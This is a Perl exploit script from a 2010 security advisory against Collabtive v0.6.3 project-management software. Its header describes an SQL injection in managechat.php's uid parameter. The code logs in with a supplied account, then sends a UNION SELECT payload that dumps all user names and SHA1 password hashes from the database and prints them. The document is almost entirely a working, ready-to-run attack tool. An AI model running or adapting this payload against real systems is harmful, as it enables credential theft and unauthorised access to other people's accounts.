#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2o1o    |
#    --------------------------------------------------
#    |   Collabtive v0.6.3 Multiple Vulnerabilities   |
#    --------------------------------------------------
# [!] Discovered by.: DNX
# [!] Homepage......: http://starbugs.host.sk
# [!] Vendor........: http://collabtive.o-dyn.de
# [!] Detected......: 04.06.2010
# [!] Reported......: 05.06.2010
# [!] Response......: xx.xx.2010
#
# [!] Background....: Collabtive ist eine web-basierte Projektmanagementsoftware.
#                     Das Projekt startete im November 2007. Es ist eine
#                     Open-Source-Software und stellt eine Alternative zu proprietären
#                     Werkzeugen wie Basecamp dar. Collabtive ist in PHP geschrieben.
#
#                     Collabtive wird von einem professionellen Team entwickelt.
#
# [!] Requirements..: Account needed
#
# [!] Bug...........: $_GET['uid'] in managechat.php near line 64
#
#                     12: $userto_id = getArrayVal($_GET, "uid");
#
#                     64: $sel = mysql_query("SELECT * FROM chat WHERE ufrom_id IN($userid,$userto_id) AND userto_id IN($userid,$userto_id) AND time > $start ORDER by time ASC");
#
#                     The password is encoded with sha1.
#
# [!] Bug...........: The arbitrary file upload discovered by USH is still present.
#                     See http://www.milw0rm.com/exploits/7076 more details.
#

if(!$ARGV[5])
{
  print "\n                       \\#'#/                   ";
  print "\n                       (-.-)                    ";
  print "\n   ---------------oOO---(_)---OOo---------------";
  print "\n   |  Collabtive v0.6.3 SQL Injection Exploit  |";
  print "\n   |               coded by DNX                |";
  print "\n   ---------------------------------------------";
  print "\n[!] Usage: perl collabtive.pl [Host] [Path] <Options>";
  print "\n[!] Example: perl collabtive.pl 127.0.0.1 /collabtive/ -user test -pass 12345";
  print "\n[!] Options:";
  print "\n       -user [text]    Username";
  print "\n       -pass [text]    Password";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";
  exit;
}

my %options = ();
GetOptions(\%options, "user=s", "pass=s", "p=s");
my $ua      = LWP::UserAgent->new();
my $cookie  = HTTP::Cookies->new();
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = "http://".$host.$path;
my $user    = "";
my $pass    = "";

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
if($options{"user"}) { $user = $options{"user"}; }
if($options{"pass"}) { $pass = $options{"pass"}; }

print "[!] Exploiting...\n\n";

exploit();

print "\n[!] Done\n";

sub exploit
{
  ##############
  # make login #
  ##############
  
  my $url = $target."manageuser.php?action=login";
  my $res = $ua->post($url, [username => $user, pass => $pass]);
  $cookie->extract_cookies($res);
  $ua->cookie_jar($cookie);
  
  ############################
  # get users with passwords #
  ############################
  
  $url = $target."managechat.php?action=pull&uid=0) union select 1,2,name,4,5,6,pass from user/*";
  $res = $ua->get($url);
  my $content = $res->content;
  
  my @c = split(/<br \/>/, $content);
  foreach (@c)
  {
    if($_ =~ /<b>(.*?):<\/b> (.*)/)
    {
      print $1.":".$2."\n";
    }
  }
}